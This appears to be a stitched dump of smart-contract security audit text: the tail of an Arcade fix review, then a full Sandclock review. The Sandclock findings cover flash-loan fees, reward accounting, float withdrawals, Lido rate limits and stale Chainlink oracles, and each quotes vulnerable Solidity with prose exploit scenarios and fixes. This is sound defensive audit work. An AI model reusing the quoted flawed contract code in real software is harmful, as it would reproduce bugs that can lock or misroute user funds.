The Arcade team understands the likelihood of this problem occurring is quite low because our UI does not allow for vault keys (vault tracking ERC721 tokens) to be deposited inside another vault contract. A power user would need to execute this type of vault key transfer via Etherscan. We elect to address this issue by:
● Thoroughly documenting this risk and providing clear and comprehensive warnings against this specific action in the documentation
● Maintaining our user interface to ensure that it does not present the option of using vault keys as collateral for loans

TOB-ARCADE-12: Risk of locked assets due to use of _mint instead of _safeMint
Resolved in commit 20b7c66. The mint function in the PromissoryNote contract has been updated to use _safeMint instead of _mint. Similarly, the initializeBundle function in the VaultFactory contract now uses _safeMint instead of _mint. These changes ensure that an ERC-721 token is not sent to a contract address that is not configured to receive it. The NatSpec comments have also been updated to reflect these changes. Additionally, the unit testing suite and mock contracts have been updated to adequately test the new expected behavior of the two altered functions.

TOB-ARCADE-13: Borrowers cannot realize full loan value without risking default
Resolved in commits 6586c37 and f1eb8ae. A new grace period after the original loan's due date was introduced with the first commit. The grace period added in this commit was a configurable setting between one hour and seven days. An admin-only function was added to set the new value, which emits events on changes or errors. A new set of unit tests was added for the setGracePeriod functionality, and existing tests were modified to take the grace period into account. However, in the second commit, the variable grace period was replaced with a constant 10-minute period. The variable-period tests were removed, and the remaining tests were modified to account for the change.

TOB-ARCADE-14: itemPredicates encoded incorrectly according to EIP-712
Resolved in commit c95e21c. Item predicates are now encoded in compliance with the EIP-712 standard. Rather than a hash representing an array of item predicates, an array of the actual Predicate structs to be signed is now presented to the signer. A _PREDICATE_TYPEHASH has been created, and the _ITEMS_TYPEHASH has been updated to correctly account for the array of Predicate structs that is now represented in the signature. The unit tests dealing with signatures that include items have been updated to reflect the changes to the signature scheme.
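For reference, EIP-712 encodes an array of structs as the keccak256 hash of the concatenation of its elements' hashStruct values. The sketch below illustrates that rule; the Predicate layout and type string are illustrative assumptions rather than Arcade's exact definitions.

// Sketch of EIP-712-compliant encoding for an array of structs; the struct
// shape and type string are assumed for illustration.
pragma solidity ^0.8.18;

contract PredicateEncodingSketch {
    struct Predicate {
        bytes data;
        address verifier;
    }

    bytes32 constant _PREDICATE_TYPEHASH =
        keccak256("Predicate(bytes data,address verifier)");

    function _hashPredicate(Predicate calldata p) internal pure returns (bytes32) {
        // Per EIP-712, dynamic `bytes` members are hashed before encoding.
        return keccak256(abi.encode(_PREDICATE_TYPEHASH, keccak256(p.data), p.verifier));
    }

    // Per EIP-712, an array is encoded as the keccak256 hash of the
    // concatenated hashStruct values of its elements.
    function _hashPredicates(Predicate[] calldata items) internal pure returns (bytes32) {
        bytes32[] memory hashes = new bytes32[](items.length);
        for (uint256 i = 0; i < items.length; i++) {
            hashes[i] = _hashPredicate(items[i]);
        }
        return keccak256(abi.encodePacked(hashes));
    }
}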
TOB-ARCADE-15: The fee values can distort the incentives for the borrowers and lenders
Unresolved. Arcade provided the following statement about this issue:

Our V3 documentation will comprehensively outline all fees within the lending protocol, pointing the users to their values at loan initiation. The Arcade team's objective is to help users grasp potential profits and anticipated fees linked with loan repayment, rollover, default, or redemption scenarios.

TOB-ARCADE-16: Malicious borrowers can use forceRepay to grief lenders
Unresolved. Arcade provided the following statement about this issue:

The Arcade.xyz team is aware that for honest lenders, having forceRepay called incurs additional gas cost and possible fees. Nevertheless, the team has elected to keep the implementation as-is: we feel that having two separate functions is a more explicit, less "surprising" design compared to having a single function whose effects may change based on external state. In general, we believe the vector allowing borrower griefing is best mitigated through proper incentive management and counterparty relationship management: borrowers who have griefed lenders in the past are likely to receive lending offers with higher premiums, as lenders try to mitigate their risk. In a larger sense, if griefing becomes a protocol-wide issue, redeem fees can be set to 0.

diff --git a/findings_newupdate/tob/2023-07-dragonfly2-securityreview.txt b/findings_newupdate/tob/2023-07-dragonfly2-securityreview.txt new file mode 100644 index 0000000..c3b0ab0 Binary files /dev/null and b/findings_newupdate/tob/2023-07-dragonfly2-securityreview.txt differ diff --git a/findings_newupdate/tob/2023-07-sandclock-securityreview.txt b/findings_newupdate/tob/2023-07-sandclock-securityreview.txt new file mode 100644 index 0000000..10657bf --- /dev/null +++ b/findings_newupdate/tob/2023-07-sandclock-securityreview.txt @@ -0,0 +1,11 @@
+1. receiveFlashLoan does not account for fees Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-SANDCLOCK-1 Target: src/steth/scWETHv2.sol, src/steth/scUSDCv2.sol Description The receiveFlashLoan functions of the scWETHv2 and scUSDCv2 vaults ignore the Balancer flash loan fees and repay exactly the amount that was loaned. This is not currently an issue because the Balancer vault does not charge any fees for flash loans. However, if Balancer implements fees for flash loans in the future, the Sandclock vaults would be prevented from withdrawing investments back into the vault.
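As an illustration of the short-term recommendation given at the end of this finding, a sketch of fee-aware repayment follows. It reuses the members of the audited scWETHv2 handler shown in figure 1.2 below (asset, balancerVault, _multiCall, and so on) and is not Sandclock's actual fix.

// Sketch only: figure 1.2's handler, adjusted to repay principal plus the
// Balancer-reported fee instead of the principal alone.
function receiveFlashLoan(
    address[] memory,
    uint256[] memory amounts,
    uint256[] memory feeAmounts,
    bytes memory userData
) external {
    _isFlashLoanInitiated();

    // the amount flashloaned
    uint256 flashLoanAmount = amounts[0];

    // decode user data and execute the batched calls
    bytes[] memory callData = abi.decode(userData, (bytes[]));
    _multiCall(callData);

    // payback flashloan: principal plus the fee reported by Balancer
    asset.safeTransfer(address(balancerVault), flashLoanAmount + feeAmounts[0]);

    _enforceFloat();
}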
function flashLoan ( IFlashLoanRecipient recipient, IERC20[] memory tokens, uint256 [] memory amounts, bytes memory userData ) external override nonReentrant whenNotPaused { uint256 [] memory feeAmounts = new uint256 [](tokens.length); uint256 [] memory preLoanBalances = new uint256 [](tokens.length); for ( uint256 i = 0 ; i < tokens.length; ++i) { IERC20 token = tokens[i]; uint256 amount = amounts[i]; preLoanBalances[i] = token.balanceOf( address ( this )); feeAmounts[i] = _calculateFlashLoanFeeAmount(amount); token.safeTransfer( address (recipient), amount); } recipient.receiveFlashLoan(tokens, amounts, feeAmounts , userData); for ( uint256 i = 0 ; i < tokens.length; ++i) { IERC20 token = tokens[i]; uint256 preLoanBalance = preLoanBalances[i]; uint256 postLoanBalance = token.balanceOf( address ( this )); uint256 receivedFeeAmount = postLoanBalance - preLoanBalance; _require(receivedFeeAmount >= feeAmounts[i]); _payFeeAmount(token, receivedFeeAmount); } } Figure 1.1: Abbreviated code showing the receivedFeeAmount check in the Balancer flashLoan method in 0xBA12222222228d8Ba445958a75a0704d566BF2C8#code#F5#L78 In the Balancer flashLoan function , shown in figure 1.1, the contract calls the recipient’s receiveFlashLoan function with four arguments: the addresses of the tokens loaned, the amounts for each token, the fees to be paid for the loan for each token, and the calldata provided by the caller. The Sandclock vaults ignore the fee amount and repay only the principal, which would lead to reverts if the fees are ever changed to nonzero values. Although this problem is present in multiple vaults, the receiveFlashLoan implementation of the scWETHv2 contract is shown in figure 1.2 as an illustrative example: function receiveFlashLoan ( address [] memory , uint256 [] memory amounts, uint256 [] memory , bytes memory userData) external { _isFlashLoanInitiated(); // the amount flashloaned uint256 flashLoanAmount = amounts[ 0 ]; // decode user data bytes [] memory callData = abi.decode(userData, ( bytes [])); _multiCall(callData); // payback flashloan asset.safeTransfer( address (balancerVault), flashLoanAmount ); _enforceFloat(); } Figure 1.2: The feeAmounts parameter is ignored by the receiveFlashLoan method. ( sandclock-contracts/src/steth/scWETHv2.sol#L232–L249 ) Exploit Scenario After Sandclock’s scUSDv2 and scWETHv2 vaults are deployed and users start depositing assets, the Balancer governance system decides to start charging fees for flash loans. Users of the Sandclock protocol now discover that, apart from the float margin, most of their funds are locked because it is impossible to use the flash loan functions to withdraw vault assets from the underlying investment pools. Recommendations Short term, use the feeAmounts parameter in the calculation for repayment to account for future Balancer flash loan fees. This will prevent unexpected reverts in the flash loan handler function. Long term, document and justify all ignored arguments provided by external callers. This will facilitate a review of the system’s third-party interactions and help prevent similar issues from being introduced in the future. +2. 
Reward token distribution rate can diverge from reward token balance Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-SANDCLOCK-2 Target: src/staking/RewardTracker.sol Description The privileged distributor role is responsible for transferring reward tokens to the RewardTracker contract and then passing the number of tokens sent as the _reward parameter to the notifyRewardAmount method. However, the _reward parameter provided to this method can be larger than the number of reward tokens transferred. Given the accounting for leftover rewards, such a situation would be difficult to recover from. /// @notice Lets a reward distributor start a new reward period. The reward tokens must have already /// been transferred to this contract before calling this function. If it is called /// when a reward period is still active, a new reward period will begin from the time /// of calling this function, using the leftover rewards from the old reward period plus /// the newly sent rewards as the reward. /// @dev If the reward amount will cause an overflow when computing rewardPerToken, then /// this function will revert. /// @param _reward The amount of reward tokens to use in the new reward period. function notifyRewardAmount ( uint256 _reward ) external onlyDistributor { _notifyRewardAmount(_reward); } Figure 2.1: The comment on the notifyRewardAmount method hints at an unenforced assumption that the number of reward tokens transferred must be equal to the _reward parameter provided. ( sandclock-contracts/src/staking/RewardTracker.sol#L185–L195 ) If a _reward value smaller than the actual number of transferred tokens is provided, the situation can be fixed by calling notifyRewardAmount again with a _reward parameter that accounts for the difference between the RewardTracker contract’s actual token balance and the rewards already scheduled for distribution. This solution is possible because the _notifyRewardAmount helper function accounts for leftover rewards if it is called during an ongoing reward period. function _notifyRewardAmount ( uint256 _reward ) internal { ... uint64 rewardRate_ = rewardRate; uint64 periodFinish_ = periodFinish; uint64 duration_ = duration; ... if ( block.timestamp >= periodFinish_) { newRewardRate = _reward / duration_; } else { uint256 remaining = periodFinish_ - block.timestamp ; uint256 leftover = remaining * rewardRate_; newRewardRate = (_reward + leftover ) / duration_; } Figure 2.2: The accounting for leftover rewards in the _notifyRewardAmount helper method ( sandclock-contracts/src/staking/RewardTracker.sol#L226–L262 ) This accounting for leftover rewards, however, makes the situation difficult to recover from if a _reward parameter that is too large is provided to the notifyRewardAmount method. As shown by the arithmetic in figure 2.2, if the reward period has not finished, the code for creating the newRewardRate value can only add to the reward distribution, not subtract from it. The only way to bring a too-large reward distribution back in line with the RewardTracker contract’s reward token balance is to transfer additional reward tokens to the contract. Exploit Scenario The RewardTracker distributor transfers 10 reward tokens to the RewardTracker contract and then mistakenly calls the notifyRewardAmount method with a _reward parameter of 100. Some users call the claimRewards method early and receive inflated rewards until the contract’s balance is depleted, leaving later users unable to claim any rewards. 
To recover, the distributor either needs to provide another 90 reward tokens to the RewardTracker contract or accept the reputational loss of allowing this misconfigured reward period to finish before resetting the reward payouts correctly during the next period. Recommendations Short term, modify the _notifyRewardAmount helper function to reset the rewardRate so that it is in line with the current rewardToken balance and the time remaining in the reward period. This change could also allow the fetchRewards method to maintain its current behavior but with only a single rewardToken.balanceOf external call. Long term, review the internal accounting state variables and document the ways in which they are influenced by the actual flow of funds. Pay attention to any internal accounting values that can be influenced by external sources, including privileged accounts, and reexamine the system’s assumptions surrounding the flow of funds. +3. Miscalculation in beforeWithdraw can leave the vault with less than minimum float Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-SANDCLOCK-3 Target: src/steth/scWETHv2.sol Description When a user wants to redeem or withdraw, the beforeWithdraw function is called with the number of assets to be withdrawn as the assets parameter. This function makes sure that if the value of the float parameter (that is, the available assets in the vault) is not enough to pay for the withdrawal, the strategy gets some assets back from the pools to be able to pay. function beforeWithdraw ( uint256 assets , uint256 ) internal override { uint256 float = asset.balanceOf( address ( this )); if (assets <= float) return ; uint256 minimumFloat = minimumFloatAmount; uint256 floatRequired = float < minimumFloat ? minimumFloat - float : 0 ; uint256 missing = assets + floatRequired - float; _withdrawToVault(missing); } Figure 3.1: The affected code in sandclock-contracts/src/steth/scWETHv2.sol#L386–L396 When the float value is enough, the function returns and the withdrawal is paid with the existing float. If the float value is not enough, the missing amount is recovered from the pools via the adapters. The issue lies in the calculation of the missing parameter: it does not guarantee that the float value remaining after the withdrawal is at least the value of the minimumFloatAmount parameter. The consequence is that the calculation always leaves a float equal to floatRequired in the vault. If this value is small enough, it can cause users to waste gas when withdrawing small amounts because they will need to pay for the gas-intensive _withdrawToVault action. This eclipses the usefulness of having the float in the vault. The correct calculation should be uint256 missing = assets + minimumFloat - float; . Using this correct calculation would make the calculation of the floatRequired parameter unnecessary as it would no longer be required or used in the rest of the code. Exploit Scenario The value for minimumFloatAmount is set to 1 ether in the scWETHv2 contract. For this scenario, suppose that the current float is exactly equal to minimumFloatAmount . Alice wants to withdraw 0.15 WETH from her invested amount. Because this amount is less than the current float, her withdrawal is paid from the vault assets, leaving the float equal to 0.85 WETH after the operation. Then, Bill wants to withdraw 0.9 WETH, but the vault has no available assets to pay for it. 
In this case, when beforeWithdraw is called, Bill has to pay gas for the call to _withdrawToVault , which is an expensive action because it includes gas-intensive operations such as loops and a flash loan. After Bill’s withdrawal, the float in the vault is 0.15 WETH. This is a relatively small amount compared with minimumFloatValue , and it will likely make the next withdrawing/redeeming user also have to pay for the call to _withdrawToVault . Recommendations Short term, replace the calculation of the missing amount to be withdrawn on line 393 of the scWETHv2 contract with assets + minimumFloat - float . This calculation will ensure that the minimum float restriction is enforced after withdrawals. It will take the required float into consideration, so the separate calculation of floatRequired on line 392 of scWETHv2 would no longer be required. Long term, add unit or fuzz tests to make sure that the vault has an amount of assets equal to or greater than the minimum expected amount at all times. +4. Last user in scWETHv2 vault will not be able to withdraw their funds Severity: Low Difficulty: Medium Type: Data Validation Finding ID: TOB-SANDCLOCK-4 Target: src/steth/scWETHv2.sol Description When a user wants to withdraw, the withdrawal amount is checked against the current vault float (the uninvested assets readily available in the vault). If the withdrawal amount is less than the float, the amount is paid from the available balance; otherwise, the protocol has to disinvest from the strategies to get the required assets to pay for the withdrawal. The issue with this approach is that in order to maintain a float equal to the minimumFloatValue parameter in the vault, the value to be disinvested from the strategies is calculated in the beforeWithdraw function, and its correct value is equal to the sum of the amount to be withdrawn and the minimum float minus the current float. If there is only one user remaining in the vault and they want to withdraw, this enforcement will not allow them to do so, because there will not be enough invested in the strategies to leave a minimum float in the vault after the withdrawal. They would only be able to withdraw their assets minus the minimum float at most. The code for the _withdrawToVault function is shown in figure 4.1. The line highlighted in the figure would cause the revert in this situation, as there would not be enough invested to supply the requested amount. 
function _withdrawToVault ( uint256 _amount ) internal { uint256 n = protocolAdapters.length(); uint256 flashLoanAmount ; uint256 totalInvested_ = _totalCollateralInWeth() - totalDebt(); bytes [] memory callData = new bytes [](n + 1 ); uint256 flashLoanAmount_ ; uint256 amount_ ; uint256 adapterId ; address adapter ; for ( uint256 i ; i < n; i++) { (adapterId, adapter) = protocolAdapters.at(i); (flashLoanAmount_, amount_) = _calcFlashLoanAmountWithdrawing(adapter, _amount, totalInvested_); flashLoanAmount += flashLoanAmount_; callData[i] = abi.encodeWithSelector( this .repayAndWithdraw.selector, adapterId, flashLoanAmount_, priceConverter.ethToWstEth(flashLoanAmount_ + amount_) ); } // needed otherwise counted as loss during harvest totalInvested -= _amount; callData[n] = abi.encodeWithSelector(scWETHv2.swapWstEthToWeth.selector, type( uint256 ).max, slippageTolerance); uint256 float = asset.balanceOf( address ( this )); _flashLoan(flashLoanAmount, callData); emit WithdrawnToVault(asset.balanceOf( address ( this )) - float); } Figure 4.1: The affected code in sandclock-contracts/src/steth/scWETHv2.sol#L342–L376 Additionally, when this revert occurs, an integer overflow is given as the reason, which obscures the real reason and can make the user’s experience more confusing. Exploit Scenario Bob is the only remaining user in a scWETHv2 vault, and he has 2 ether invested. He wants to withdraw his assets, but all of his calls to the withdrawal function keep reverting due to an integer overflow. He keeps trying, wasting gas in the process, until he discovers that the maximum amount he is allowed to withdraw is around 1 ether. The rest of his funds are locked in the vault until the keeper makes a manual call to withdrawToVault or until the admin lowers the minimum float value. Recommendations Short term, fix the calculation of the amount to be withdrawn and make sure that it never exceeds the total invested amount. Long term, add end-to-end unit or fuzz tests that are representative of the way multiple users can interact with the protocol. Test for edge cases involving various numbers of users, investment amounts, and critical interactions, and make sure that the protocol’s invariants hold and that users do not lose access to funds in the event of such edge cases. +5. Lido stake rate limit could lead to unexpected reverts Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-SANDCLOCK-5 Target: src/steth/Swapper.sol Description To mitigate the effects of a surge in demand for stETH on the deposit queue, Lido has implemented a rate limit for stake submissions. This rate limit is ignored by the lidoSwapWethToWstEth method of the Swapper library, potentially leading to unexpected reversions. The Lido stETH integration guide states the following: To avoid [reverts due to the rate limit being hit], you should check if getCurrentStakeLimit() >= amountToStake , and if it's not you can go with an alternative route. function lidoSwapWethToWstEth ( uint256 _wethAmount ) external { // weth to eth weth.withdraw(_wethAmount); // stake to lido / eth => stETH stEth.submit{value: _wethAmount}( address ( 0x00 )); // stETH to wstEth uint256 stEthBalance = stEth.balanceOf( address ( this )); ERC20( address (stEth)).safeApprove( address (wstETH), stEthBalance); wstETH.wrap(stEthBalance); } Figure 5.1: The submit method is subject to a rate limit that is not taken into account. 
( sandclock-contracts/src/steth/Swapper.sol#L130–L142 ) Exploit Scenario A surge in demand for Ethereum validators leads many people using Lido to stake ETH, causing the Lido rate limit to be hit, and the submit method of the stEth contract begins to revert. As a result, the Sandclock keeper is unable to deposit despite the presence of alternate routes to obtain stETH, such as through Curve or Balancer. Recommendations Short term, have the lidoSwapWethToWstEth method of the Swapper library check whether the amount being deposited is less than the value returned by the getCurrentStakeLimit method of the stEth contract. If it is not, have the code use ZeroEx to swap or revert with a message that clearly communicates the reason for the failure. Long term, review the documentation for all third-party interactions and note any situations in which the integration could revert unexpectedly. If such reversions are acceptable, clearly document how they could occur and include a justification for this acceptance in the inline comments.
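To make the short-term recommendation concrete, here is a sketch of figure 5.1's function with the stake-limit check that Lido documents (getCurrentStakeLimit) added. The revert message and the shape of the fallback branch are assumptions; the report suggests routing through ZeroEx rather than reverting where possible.

// Sketch of the recommended rate-limit check; the fallback branch and revert
// message are illustrative, not Sandclock's actual code.
function lidoSwapWethToWstEth(uint256 _wethAmount) external {
    // weth to eth
    weth.withdraw(_wethAmount);

    // Only stake directly with Lido when the documented rate limit allows it.
    if (stEth.getCurrentStakeLimit() >= _wethAmount) {
        // stake to lido / eth => stETH
        stEth.submit{value: _wethAmount}(address(0x00));
    } else {
        // Assumed fallback: take an alternative route (e.g., a ZeroEx swap),
        // or fail with a clear reason as below.
        revert("Lido stake rate limit exceeded");
    }

    // stETH to wstEth
    uint256 stEthBalance = stEth.balanceOf(address(this));
    ERC20(address(stEth)).safeApprove(address(wstETH), stEthBalance);
    wstETH.wrap(stEthBalance);
}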
+6. Chainlink oracles could return stale price data Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-SANDCLOCK-6 Target: src/steth/PriceConverter.sol, src/liquity/scLiquity.sol Description The latestRoundData() function from Chainlink oracles returns five values: roundId, answer, startedAt, updatedAt, and answeredInRound. The PriceConverter contract reads only the answer value and discards the rest. This can cause outdated prices to be used for token conversions, such as the ETH-to-USDC conversion shown in figure 6.1.

function ethToUsdc(uint256 _ethAmount) public view returns (uint256) {
    (, int256 usdcPriceInEth,,,) = usdcToEthPriceFeed.latestRoundData();
    return _ethAmount.divWadDown(uint256(usdcPriceInEth) * C.WETH_USDC_DECIMALS_DIFF);
}

Figure 6.1: All returned data other than the answer value is ignored during the call to a Chainlink feed's latestRoundData method. ( sandclock-contracts/src/steth/PriceConverter.sol#L67–L71 )

According to the Chainlink documentation, if the latestRoundData() function is used, the updatedAt value should be checked to ensure that the returned value is recent enough for the application.
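A sketch of such a check applied to figure 6.1's ethToUsdc follows; the one-hour threshold is an assumed tuning parameter, not a value from the codebase.

// Sketch of the staleness check advised by the Chainlink documentation.
uint256 constant MAX_PRICE_AGE = 1 hours; // assumed threshold; tune per feed

function ethToUsdc(uint256 _ethAmount) public view returns (uint256) {
    (, int256 usdcPriceInEth,, uint256 updatedAt,) =
        usdcToEthPriceFeed.latestRoundData();
    require(usdcPriceInEth > 0, "invalid price");
    require(block.timestamp - updatedAt <= MAX_PRICE_AGE, "stale price");
    return _ethAmount.divWadDown(uint256(usdcPriceInEth) * C.WETH_USDC_DECIMALS_DIFF);
}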
Similarly, the LUSD/ETH price feed used by the scLiquity vault is an intermediate contract that calls the deprecated latestAnswer method on upstream Chainlink oracles.

contract LSUDUsdToLUSDEth is IPriceFeed {
    IPriceFeed public constant LUSD_USD = IPriceFeed(0x3D7aE7E594f2f2091Ad8798313450130d0Aba3a0);
    IPriceFeed public constant ETH_USD = IPriceFeed(0x5f4eC3Df9cbd43714FE2740f5E3616155c5b8419);

    function latestAnswer() external view override returns (int256) {
        return (LUSD_USD.latestAnswer() * 1 ether) / ETH_USD.latestAnswer();
    }
}

Figure 6.2: The custom latestAnswer method in 0x60c0b047133f696334a2b7f68af0b49d2F3D4F72#code#L19

The Chainlink API reference flags the latestAnswer method as "(Deprecated - Do not use this function.)". Note that the upstream IPriceFeed contracts called by the intermediate LSUDUsdToLUSDEth contract are upgradeable proxies. It is possible that the implementations will be updated to remove support for the deprecated latestAnswer method, breaking the scLiquity vault's lusd2eth price feed. Because the oracle price feeds are used for calculating the slippage tolerance, a difference may exist between the oracle price and the DEX pool spot price, either due to price update delays or normal price fluctuations or because the feed has become stale. This could lead to two possible adverse scenarios:
● If the oracle price is significantly higher than the pool price, the slippage tolerance could be too loose, introducing the possibility of an MEV sandwich attack that can profit on the excess.
● If the oracle price is significantly lower than the pool price, the slippage tolerance could be too tight, and the transaction will always revert. Users will perceive this as a denial of service because they would not be able to interact with the protocol until the price difference is settled.

Exploit Scenario Bob has assets invested in a scWETHv2 vault and wants to withdraw part of his assets. He interacts with the contracts, and every withdrawal transaction he submits reverts due to a large difference between the oracle and pool prices, leading to failed slippage checks. This results in a waste of gas and leaves Bob confused, as there is no clear indication of where the problem lies. Recommendations Short term, make sure that the oracles report up-to-date data, and replace the external LUSD/ETH oracle with one that supports verification of the latest update timestamp. In the case of stale oracle data, pause price-dependent Sandclock functionality until the oracle comes back online or the admin replaces it with a live oracle. Long term, review the documentation for Chainlink and other oracle integrations to ensure that all of the security requirements are met to avoid potential issues, and add tests that take these possible situations into account.

A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document.
Vulnerability Categories

Category | Description
Access Controls | Insufficient authorization or assessment of rights
Auditing and Logging | Insufficient auditing of actions or logging of problems
Authentication | Improper identification of users
Configuration | Misconfigured servers, devices, or software components
Cryptography | A breach of system confidentiality or integrity
Data Exposure | Exposure of sensitive information
Data Validation | Improper reliance on the structure or values of data
Denial of Service | A system failure with an availability impact
Error Reporting | Insecure or insufficient reporting of error conditions
Patching | Use of an outdated software package or library
Session Management | Improper identification of authenticated users
Testing | Insufficient test methodology or test coverage
Timing | Race conditions or other order-of-operations flaws
Undefined Behavior | Undefined behavior triggered within the system

Severity Levels

Severity | Description
Informational | The issue does not pose an immediate risk but is relevant to security best practices.
Undetermined | The extent of the risk was not determined during this engagement.
Low | The risk is small or is not one the client has indicated is important.
Medium | User information is at risk; exploitation could pose reputational, legal, or moderate financial risks.
High | The flaw could affect numerous users and have serious reputational, legal, or financial implications.

Difficulty Levels

Difficulty | Description
Undetermined | The difficulty of exploitation was not determined during this engagement.
Low | The flaw is well known; public tools for its exploitation exist or can be scripted.
Medium | An attacker must write an exploit or will need in-depth knowledge of the system.
High | An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue.

B. Code Maturity Categories The following tables describe the code maturity categories and rating criteria used in this document.

Code Maturity Categories

Category | Description
Arithmetic | The proper use of mathematical operations and semantics
Auditing | The use of event auditing and logging to support monitoring
Authentication / Access Controls | The use of robust access controls to handle identification and authorization and to ensure safe interactions with the system
Complexity Management | The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions
Cryptography and Key Management | The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution
Decentralization | The presence of a decentralized governance structure for mitigating insider threats and managing risks posed by contract upgrades
Documentation | The presence of comprehensive and readable codebase documentation
Front-Running Resistance | The system's resistance to front-running attacks
Low-Level Manipulation | The justified use of inline assembly and low-level calls
Testing and Verification | The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage

Rating Criteria

Rating | Description
Strong | No issues were found, and the system exceeds industry standards.
Satisfactory | Minor issues were found, but the system is compliant with best practices.
Moderate | Some issues that may affect system safety were found.
Weak | Many issues that affect system safety were found.
Missing | A required component is missing, significantly affecting system safety.
Not Applicable | The category is not applicable to this review.
Not Considered | The category was not considered in this review.
Further Investigation Required | Further investigation is required to reach a meaningful conclusion.

C. Code Quality Recommendations The following recommendations are not associated with specific vulnerabilities. However, implementing them may enhance code readability and may prevent the introduction of vulnerabilities in the future.

● Disambiguate the system's contract names. The EulerAdapter and AaveV3Adapter contract names refer to more than one distinct contract. Some frameworks and analysis tools will crash when a project contains two contracts with the same name. Additionally, this pattern increases the risk of miscommunication between developers, auditors, and/or users. Consider adding a prefix or suffix to such contract names or, if applicable, consolidating them into a single contract.
● Consider having helper functions load values directly from storage. Many methods load values from storage and then pass them to internal helper functions. Some of these methods, enumerated below, do not use the loaded values except to pass them to the helper functions. Consider replacing the following arguments with direct storage loads.
  ○ BonusTracker._earnedBonus
    ■ accountBalance => balanceOf[account]
    ■ accountBonus => bonus[account]
  ○ RewardTracker._earned
    ■ _accountBalance => balanceOf[account] + multiplierPointsOf[_account]
    ■ _accountRewards => rewards[account]
  ○ RewardTracker._calcRewardPerToken
    ■ _totalSupply => totalSupply + totalBonus
● Use helper functions consistently. An assignment to the lastTimeRewardApplicable_ variable on line 241 of the RewardTracker contract features a ternary expression identical to that of the lastTimeRewardApplicable method in the same contract. To reduce code duplication and improve readability, replace this lastTimeRewardApplicable_ assignment with a call to this helper method instead.
● Remove unnecessary variable assignments. The lastUpdateTime variable is updated on line 251 of the RewardTracker contract, but this new value is not used before the same variable is updated again on line 270. Removing the first assignment on line 251 will yield identical behavior and improve the code's readability.
● Use constants consistently. The addresses defined on lines 23–28 of the scLiquity contract could be specified as constant to save gas during deployment. However, to improve the maintainability of the code, consider defining these variables in the src/lib/Constants.sol file to keep all third-party contract addresses in one place. The following are the Sandclock contracts that define third-party addresses in place; consider importing them from Constants instead:
  ○ scLiquity
  ○ AaveV2Adapter (both)
  ○ EulerAdapter (only in scUSDCv2-adapters)
  ○ MorphoAaveV3Adapter
  ○ Swapper
  Note that some of these, such as the xrouter address defined by the scLiquity contract, are already present in the Constants library. Also note that some addresses in the Constants library are defined twice, such as the ZEROX_ROUTER and ZERO_EX_ROUTER addresses.
● Document the omission of LQTY in the scLiquity contract's totalAssets method. The LQTY rewards earned by depositing into the Liquity Stability Pool are expected to be small, but the gas costs for factoring LQTY rewards into the scLiquity vault are significant.
As a result, the Sandclock team has made the decision to omit LQTY rewards from the totalAssets value. This design decision should be clearly specified and justified in inline comments.
● Document the requirements for using the Swapper contract. The Swapper contract handles ether but does not implement a receive method because it is intended to be used via delegatecall from a contract that does implement the receive method. Add comments to the Swapper contract documenting these requirements so that future developers and auditors are aware of how it should be safely used.
● Use libraries in the scLiquity vault. The scLiquity vault uses error-prone low-level calls to the 0x router while harvesting proceeds for LUSD. The Swapper library implements similar swap logic with additional safety measures. Consider using the Swapper library to exchange assets instead of re-implementing this logic in place. For consistency, also consider moving the LUSD-to-ETH price-fetching logic into the PriceConverter library.

D. Fix Review Results When undertaking a fix review, Trail of Bits reviews the fixes implemented for issues identified in the original report. This work involves a review of specific areas of the source code and system configuration, not comprehensive analysis of the system. On July 27, 2023, Trail of Bits reviewed the fixes and mitigations implemented by the Lindy Labs team for the issues identified in this report. We reviewed each fix to determine its effectiveness in resolving the associated issue. In summary, of the six issues described in this report, Lindy Labs has resolved four, has partially resolved one, and has not resolved the remaining issue. For additional information, refer to the Detailed Fix Review Results below.

ID | Title | Severity | Status
1 | receiveFlashLoan does not account for fees | High | Resolved
2 | Reward token distribution rate can diverge from reward token balance | Low | Resolved
3 | Miscalculation in beforeWithdraw can leave the vault with less than minimum float | Informational | Resolved
4 | Last user in scWETHv2 vault will not be able to withdraw their funds | Low | Resolved
5 | Lido stake rate limit could lead to unexpected reverts | Informational | Unresolved
6 | Chainlink oracles could return stale price data | Informational | Partially Resolved

Detailed Fix Review Results

TOB-SANDCLOCK-1: receiveFlashLoan does not account for fees
Resolved. The feeAmounts parameter provided by Balancer flash loans is no longer ignored by the receiveFlashLoan method. The fees are now incorporated into the asset management strategy; other updates include a modified borrow amount from Aave and a modified swap amount from Uniswap. New unit tests have been added to ensure that the newly added logic properly accounts for nonzero fees that might be introduced by Balancer in the future.

TOB-SANDCLOCK-2: Reward token distribution rate can diverge from reward token balance
Resolved. The current token balance is now used by the _startRewardsDistribution method (renamed from _notifyRewardAmount) of the RewardTracker contract. An additional state variable tracks the previously measured token balance to properly account for any balance increases. The distributor role no longer provides a parameter specifying how many reward tokens to allocate, eliminating any possibility of divergence.

TOB-SANDCLOCK-3: Miscalculation in beforeWithdraw can leave the vault with less than minimum float
Resolved. The arithmetic calculating how much float is missing has been fixed.
A new unit test has been added that reproduces the provided exploit scenario to ensure that this change fixes the underlying issue and to prevent regression.

TOB-SANDCLOCK-4: Last user in scWETHv2 vault will not be able to withdraw their funds
Resolved. The _withdrawToVault method was refactored to limit the amount that the vault withdraws from investment strategies. This allows the last user to withdraw their remaining balance from the vault despite normal float requirements. A new assertion was added to the unit tests to ensure that the last user is able to withdraw their funds.

TOB-SANDCLOCK-5: Lido stake rate limit could lead to unexpected reverts
Unresolved. The client provided the following context for this finding's fix status:

We acknowledge the issue with a potential lido stake rate limit but we feel it will have a limited effect and not lead to reverts on user deposits since user funds first end up in the vault.

Additional comments have been added specifying that the ZeroEx exchange will be the default method for swapping WETH for wstETH and that Lido will be used as a fallback, decreasing the likelihood of hitting the rate limit. For the benefit of future auditors, we recommend adding an inline comment to the lidoSwapWethToWstEth method in the Swapper library to explain the acceptance of the risk and the use of Lido only as a fallback.

